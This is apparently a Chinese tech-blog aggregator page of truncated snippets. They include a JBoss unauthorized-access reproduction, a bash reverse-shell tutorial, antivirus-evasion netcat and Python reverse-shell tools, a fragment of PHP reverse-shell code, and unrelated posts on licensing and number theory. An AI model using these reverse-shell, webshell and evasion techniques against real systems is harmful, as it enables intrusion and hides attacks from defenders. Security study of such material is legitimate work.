jboss 未授权访问漏洞复现 一、漏洞描述 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建及复现 1、 这里用CVE-2017-7504的漏洞环境,启动环境 docker-compose up ...
分类:
其他好文 时间:
2019-08-02 14:34:35
阅读次数:
139
必备技能点掌握情况: 技能点 掌握情况和体会 1、虚拟机使用 熟练使用vmware, 安装过centos集群。 网桥配置很熟练 目前有以下配置?? 2、Kali使用和Linux基本命令 kali常用工具 我之前整理了对kali工具集的使用 nc 瑞士军刀、 nmap 扫描工具 sqlmap burp ...
分类:
其他好文 时间:
2019-07-31 09:14:19
阅读次数:
90
反弹shell 1.bash反弹 攻击机监听端口 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i:交互式shell >& :输入输出重定向:0 stdi ...
分类:
系统相关 时间:
2019-07-29 19:02:53
阅读次数:
333
您可以自由: 共享 —— 在任何媒介以任何形式复制、发行本作品 演绎 —— 修改、转换或以本作品为基础进行创作 只要你遵守许可协议条款,许可人就无法收回你的这些权利。 惟须遵守下列条件: 署名 —— 您必须给出适当的署名,提供指向本许可协议的链接,同时标明是否对原始作品作了修改。您可以用任何合理的方 ...
分类:
其他好文 时间:
2019-07-27 15:53:06
阅读次数:
410
莫比乌斯函数总结 性质 :$\sum_{d|n}\mu(d)=[n==1]$ 这个可以用组合数的性质来证,形象点的话就是杨辉三角。 因为恒等式:$\sum_{i=0}^{n}( 1)^nC_{n}^{i}=0$. 莫比乌斯反演: 形式一: 已知:$g(n)=\sum_{d|n}f(d)$,则有:$f ...
分类:
其他好文 时间:
2019-07-23 15:24:54
阅读次数:
379
各种傻逼特判,判错一个就40 思路: 思路有两种 首先求出来左右边界然后拿右边界减左边界,非常简单,按照解方程的方法求即可 代码(我没打出来一直40分,这里是nc的代码) 求出来ymax 再求出来ymin 再/a 非常简单的思路(虽然我觉得第一个更简单) 题目思路还是挺简单的就是一些恶心的特判 特判 ...
分类:
其他好文 时间:
2019-07-22 20:11:58
阅读次数:
136
有时候网站服务器上有杀毒软件,我们上传的nc.exe、lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell。 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀。 参考链接:https://medium.com/bugbount ...
分类:
编程语言 时间:
2019-07-21 13:32:35
阅读次数:
601
GitHub链接:https://github.com/7hmA3s/netcat 免杀情况: 360杀毒/5.0.0.8160 -- 静态扫描和动态执行均免杀 赛门铁克/14.0.3752 -- 静态扫描和动态执行均免杀 反弹shell步骤: 第1步: 外网服务器执行: netcat -l -p ...
分类:
Web程序 时间:
2019-07-21 13:16:40
阅读次数:
168
内网 nc netsh 内网-》外网实现穿透 花生壳 Ngrok ...
分类:
其他好文 时间:
2019-07-16 16:49:57
阅读次数:
90
array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; i... ...
分类:
系统相关 时间:
2019-07-16 12:24:40
阅读次数:
131
